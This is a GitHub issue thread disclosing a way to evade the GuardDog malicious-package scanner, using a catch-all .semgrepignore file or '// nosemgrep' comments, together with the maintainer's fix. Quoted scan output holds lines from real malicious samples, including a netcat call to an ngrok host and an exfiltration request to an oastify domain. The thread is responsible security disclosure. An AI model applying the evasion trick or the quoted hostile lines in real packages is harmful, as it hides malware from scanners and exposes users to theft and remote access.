### ISSUE TITLE
Source code heuristics can be easily bypassed

### ISSUE THREAD

**Issue by krzysztofkorozej** [DataDog/guarddog#508]
Hello!
During my little research, I found a way to fool GuardDog and pass the scan of malicious packages without raising any indicators in the results. This is due to the fact that GuardDog uses Semgrep under the hood, while [Semgrep allows ignoring](https://semgrep.dev/docs/ignoring-files-folders-code#reference-summary) code fragments through comments like `// nosemgrep` or specific files using a `.semgrepignore` file placed in the project's root directory. 

Let's imagine that an attacker creates a malicious package and places a `.semgrepignore` file in the project's root with the following content:
```text
# Ignore everything
*
```

For testing purposes, I randomly selected one of the packages from the DataDog's malicious software packages dataset repository ([this one](https://github.com/DataDog/malicious-software-packages-dataset/tree/main/samples/npm/openai-extension/1.0.0)) that was flagged as malicious by GuardDog, and then added a `.semgrepignore` file in the project's root. Here's the result:
```text
$ cat package.json
{
  "name": "openai-extension",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
 "preinstall": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC"
}
$ docker run -v "$(pwd):/app" --rm ghcr.io/datadog/guarddog:latest npm scan .

Found 2 potentially malicious indicators in .

shady-links: found 1 source code matches
  * This package contains an URL to a domain with a suspicious extension at index.js:25
        hostname: "3oskt7p0fd27cl3pusks1534zv5otfh4.oastify.com",

npm-exfiltrate-sensitive-data: found 1 source code matches
  * This package is exfiltrating sensitive data to a remote server at index.js:35
        var req = https.request(options, (res) => {
        res.on("data", (d) => {
            process.stdout.write(d);
        });
    });

$ cp .semgrepignore.example .semgrepignore
$ docker run -v "$(pwd):/app" --rm ghcr.io/datadog/guarddog:latest npm scan .

Found 0 potentially malicious indicators scanning .

$ cat .semgrepignore
# Ignore everything
*
```

Tested on latest GuardDog version (v2.1.0).

I believe that adding the flags `--disable-nosem` and `--x-ignore-semgrepignore-files` should resolve the issue.
https://github.com/DataDog/guarddog/blob/3c3c83fa5095018ada7435de5c9eeaeeaa8f6e6a/guarddog/analyzer/analyzer.py#L275-L287

Keep in mind that according to [Semgrep CLI reference](https://semgrep.dev/docs/cli-reference):
```text
       --x-ignore-semgrepignore-files
           [INTERNAL] Ignore all '.semgrepignore' files found in the project
           tree for the purpose of selecting target files to be scanned by
           semgrep. Other filters may still apply. THIS OPTION IS NOT PART OF
           THE SEMGREP API AND MAY CHANGE OR DISAPPEAR WITHOUT NOTICE. 
```

**Comment by krzysztofkorozej** [comment]
It appears that Semgrep 1.94.0 does not support the experimental flag `--x-ignore-semgrepignore-files`. This is exactly the same version as specified in GuardDog lock file:
https://github.com/DataDog/guarddog/blob/3c3c83fa5095018ada7435de5c9eeaeeaa8f6e6a/poetry.lock#L1999-L2001

I have Semgrep 1.94.0 installed locally on my machine. I attempted to run a simple Semgrep scan against a dummy project using the above option, but it was unsuccessful.
```text
$ semgrep scan --x-ignore-semgrepignore-files --config auto .
[00.05][WARNING]: !!! You're using one or more options starting with '--x-'. These options are not part of the semgrep API. They will change or will be removed without notice !!!

┌──── ○○○ ────┐
│ Semgrep CLI │
└─────────────┘

Usage: semgrep scan [OPTIONS] [TARGETS]...

Error: No such option: --x-ignore-semgrepignore-files
```

**Comment by krzysztofkorozej** [comment]
I believe that this issue should be resolved in the following way:

- Append `--disable-nosem` option to command execution
- Remove `.semgrepignore` from the analyzed package files before invoking Semgrep

**Comment by sobregosodd** [comment]
Hello, @krzysztofkorozej thank you for reporting this.

The issue is more related to the way the volume is mounted, the problem is that you are creating a `. semgrepignore` file in the working path of semgrep, if the volume is mounted elsewhere the problem does not occurs

```
> cat .semgrepignore
# Ignore everything
*%

> docker run --rm -ti -v "$(pwd):/tmp/sometest" ghcr.io/datadog/guarddog:latest npm scan /tmp/sometest
Found 1 potentially malicious indicators in /tmp/sometest

shady-links: found 1 source code matches
  * This package contains an URL to a domain with a suspicious extension at baby-electron/package/main.js:4
        const args = ['-i', 'nc', '2.tcp.eu.ngrok.io', '12151'];

> docker run --rm -ti -v "$(pwd):/app" ghcr.io/datadog/guarddog:latest npm scan /app
Found 0 potentially malicious indicators scanning /app
```

**Comment by krzysztofkorozej** [comment]
Hello @sobregosodd 
Good catch! However, I noticed some inconsistencies in the results related to the mount path:
```text
$ docker run -v "$(pwd):/tmp/test" --rm -it ghcr.io/datadog/guarddog:latest npm scan /tmp/test

Found 1 potentially malicious indicators in /tmp/test

npm-exfiltrate-sensitive-data: found 1 source code matches
  * This package is exfiltrating sensitive data to a remote server at index.js:35
        var req = https.request(options, (res) => {
        res.on("data", (d) => {
            process.stdout.write(d);
        });
    });

$ docker run -v "$(pwd):/app" --rm -it ghcr.io/datadog/guarddog:latest npm scan /app

Found 2 potentially malicious indicators in /app

shady-links: found 1 source code matches
  * This package contains an URL to a domain with a suspicious extension at index.js:25
        hostname: "3oskt7p0fd27cl3pusks1534zv5otfh4.oastify.com",

npm-exfiltrate-sensitive-data: found 1 source code matches
  * This package is exfiltrating sensitive data to a remote server at index.js:35
        var req = https.request(options, (res) => {
        res.on("data", (d) => {
            process.stdout.write(d);
        });
    });
```

It seems that mounting to /tmp/test causes in losing one indicator in results? 

Moreover, this is just one side of the problem, as I, as a threat actor, can still bypass static heuristic checks using comments `// nosemgrep`, which are independent of how the volume is mounted.

**Comment by sobregosodd** [comment]
The inconsistency you notice is due to `shady-links` excludes running on `*/test/*` paths.

> Moreover, this is just one side of the problem, as I, as a threat actor, can still bypass static heuristic checks using comments // nosemgrep, which are independent of how the volume is mounted.

You are correct on this one, we will introduce the suggested mitigation:
` Append --disable-nosem option to command execution `

We'll not remove any `.semgrepignore`, we try to avoid changing the sample in any way if not mandatory.

**Comment by krzysztofkorozej** [comment]
Alright, that makes sense. Thank you, and I wish you a Happy New Year!
